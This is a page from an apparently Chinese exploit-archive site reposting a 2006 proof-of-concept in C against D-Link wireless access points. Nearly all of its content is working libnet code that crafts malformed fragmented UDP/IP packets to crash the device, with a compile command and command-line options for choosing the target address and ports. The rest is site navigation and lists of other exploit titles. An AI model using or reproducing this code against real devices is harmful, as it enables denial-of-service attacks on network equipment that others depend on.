首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link Wireless Access Point UDP Packets Remote Denial of Service Exploit
来源:silc.thunkers.net 作者:Aaron 发布时间:2006-02-15  

D-Link Wireless Access Point UDP Packets Remote Denial of Service Exploit


/*
*
* Aaron Portnoy
*
* silc.thunkers.net, thunkers
*
* D-Link Wireless Access Point
* Fragmented UDP DoS Proof of Concept
*
*
* gcc -o dlink_dos dlink_dos.c -lnet -Wall
*
*/

#include <libnet.h>

#define DEVICE "eth0"
#define SRC_IP "127.0.0.1"
#define DST_IP "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111

void usage (char *name)
{
fprintf (stderr,
"Usage: %s -s <source ip> -d <destination ip>\
-a <source port> -b <destination port> \n",
name);

exit (EXIT_FAILURE);
}

int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
u_short dPRT, int count)
{

libnet_t *l = NULL;
libnet_ptag_t udp = 0;
libnet_ptag_t ip = 0;

char errbuf[LIBNET_ERRBUF_SIZE];
char *payload = NULL;
u_short payload_s = 0, src_prt, dst_prt;
u_long src_ip, dst_ip;
int c, frag;

if (!device)
device = DEVICE;

l = libnet_init (LIBNET_RAW4, device, errbuf);

if (!l) {
fprintf (stderr, "libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE);
}

src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);

dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);

src_prt = sPRT ? sPRT : SRC_PRT;

dst_prt = dPRT ? dPRT : DST_PRT;

if (count == 1) {
payload = "\0\0\0\0\0\0\0\0";
payload_s = 8;
}

udp = libnet_build_udp (src_prt,
dst_prt,
(LIBNET_UDP_H + payload_s) * 2,
0, (unsigned char *)payload, payload_s, l, udp);

if (udp == -1) {
fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}

switch (count) {

case 1:
frag = IP_MF;
break;

case 2:
frag = 0x2002;
break;

case 3:
frag = 0x0003;
break;
}

ip = libnet_build_ipv4 (20,
0,
1800,
frag,
128,
IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);

if (ip == -1) {
fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}

c = libnet_write (l);

if (c == -1) {
fprintf (stderr, "Write error: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}

printf ("Wrote UDP packet; check the wire.\n");

libnet_destroy (l);

return (EXIT_SUCCESS);

}

int main (int argc, char **argv)
{

int i;
char *pDST, *pSRC, *device;
u_short dPRT = 0;
u_short sPRT = 0;

pDST = pSRC = device = NULL;

while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) {
switch (i) {
case 'D':
device = optarg;
break;
case 'd':
pDST = optarg;
break;
case 's':
pSRC = optarg;
break;
case 'a':
sPRT = atoi (optarg);
break;
case 'b':
dPRT = atoi (optarg);
break;
case 'h':
usage (argv[0]);
break;
}
}

printf ("\n----------------------------------\n");
printf (" -= D-Link DoS PoC =-\n");
printf (" Aaron Portnoy\n");
printf (" deft () thunkers ! net \n");
printf (" silc.thunkers.net, thunkers\n");
printf ("----------------------------------\n");


device ? printf ("\nDevice: \t%s\n", device) :
printf ("\nDevice: \t%s\n", DEVICE);

pSRC ? printf ("SRC IP: \t%s\n", pSRC) :
printf ("SRC IP: \t%s\n", SRC_IP);

pDST ? printf ("DST IP: \t%s\n", pDST) :
printf ("DST IP: \t%s\n", DST_IP);

sPRT ? printf ("SPort: \t\t%d\n", sPRT) :
printf ("SPort: \t\t%d\n", SRC_PRT);

dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) :
printf ("DPort: \t\t%d\n\n", DST_PRT);

for (i = 1; i <= 3; i++)
gen_packet (device, pSRC, pDST, sPRT, dPRT, i);
printf ("\n");

return (EXIT_SUCCESS);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft HTML Help Workshop .
·Microsoft HTML Help Workshop .
·Microsoft Windows Services Ins
·EGS Enterprise Groupware Syste
·Microsoft HTML Help Workshop .
·FlySpray 0.9.7 remote commands
·Invision Power Board Army Syst
·OpenVMPSd v1.3 Remote Format S
·Local root exploit for QNX Neu
·Power Daemon v2.0.2 Remote For
·CPGNuke Dragonfly 9.0.6.1 remo
·Microsoft Windows Media Player
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved